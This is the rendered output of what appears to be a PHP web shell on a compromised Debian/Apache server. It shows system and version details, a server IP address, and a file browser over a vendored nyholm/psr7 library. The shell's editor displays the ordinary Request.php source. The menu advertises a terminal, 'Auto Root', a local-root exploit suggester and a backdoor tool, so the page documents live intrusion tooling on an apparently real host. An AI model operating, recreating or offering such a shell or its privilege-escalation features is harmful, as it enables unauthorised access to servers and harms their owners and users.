Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.41
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
html_old /
iNetty /
vendor /
nyholm /
psr7 /
src /
Delete
Unzip
Name
Size
Permission
Date
Action
Factory
[ DIR ]
drwxr-xr-x
2022-04-21 14:21
MessageTrait.php
6.54
KB
-rw-r--r--
2022-04-21 14:21
Request.php
1.32
KB
-rw-r--r--
2022-04-21 14:21
RequestTrait.php
2.58
KB
-rw-r--r--
2022-04-21 14:21
Response.php
4.13
KB
-rw-r--r--
2022-04-21 14:21
ServerRequest.php
3.93
KB
-rw-r--r--
2022-04-21 14:21
Stream.php
7.85
KB
-rw-r--r--
2022-04-21 14:21
UploadedFile.php
5.4
KB
-rw-r--r--
2022-04-21 14:21
Uri.php
8.16
KB
-rw-r--r--
2022-04-21 14:21
Save
Rename
<?php declare(strict_types=1); namespace Nyholm\Psr7; use Psr\Http\Message\{RequestInterface, StreamInterface, UriInterface}; /** * @author Tobias Nyholm <tobias.nyholm@gmail.com> * @author Martijn van der Ven <martijn@vanderven.se> * * @final This class should never be extended. See https://github.com/Nyholm/psr7/blob/master/doc/final.md */ class Request implements RequestInterface { use MessageTrait; use RequestTrait; /** * @param string $method HTTP method * @param string|UriInterface $uri URI * @param array $headers Request headers * @param string|resource|StreamInterface|null $body Request body * @param string $version Protocol version */ public function __construct(string $method, $uri, array $headers = [], $body = null, string $version = '1.1') { if (!($uri instanceof UriInterface)) { $uri = new Uri($uri); } $this->method = $method; $this->uri = $uri; $this->setHeaders($headers); $this->protocol = $version; if (!$this->hasHeader('Host')) { $this->updateHostFromUri(); } // If we got no body, defer initialization of the stream until Request::getBody() if ('' !== $body && null !== $body) { $this->stream = Stream::create($body); } } }